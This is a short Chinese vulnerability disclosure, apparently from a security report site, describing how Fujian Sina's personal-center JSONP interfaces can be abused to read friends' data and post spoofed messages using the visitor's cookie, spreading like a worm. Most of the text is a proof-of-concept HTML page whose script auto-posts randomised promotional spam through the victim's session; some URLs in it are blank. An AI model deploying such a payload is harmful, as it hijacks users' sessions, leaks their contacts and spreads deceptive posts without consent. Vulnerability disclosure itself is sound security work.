福建新浪个人中心调用的两个jsonp接口可以被恶意利用,获取好友信息,并利用cookie劫持无需其他授权发布欺骗信息。就像蠕虫一样传播。
关键代码:
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sample Page</title>
<script type="text/javascript" src=""></script>
<script type="text/javascript" src=""></script>
<script type="text/javascript">
var content = ['嘿嘿,w ww.2cto.com 推荐大家收听@丸子-_- ,他写的这个东西很好玩,',
'我擦,涛涛电脑知识网,@丸子-_- 他写的这个东西太牛逼了,',
'昂~@丸子-_- 他写的这个东西好羞色哟~,'],
pics = ["",""],
i = Math.floor(Math.random() * 2),
pic = pics[i],
success = function(json){
//window.location='';
},
failure = function(json){
//alert(json.errmsg);
},
url = "?callback=?";
WBCMD("post",{content:content[Math.round(Math.random()*2)],pic:pic,atNum:1,filter:[],must:[],url:url},success,failure);
</script>
</head>
漏洞证明:
,www.xuhantao.com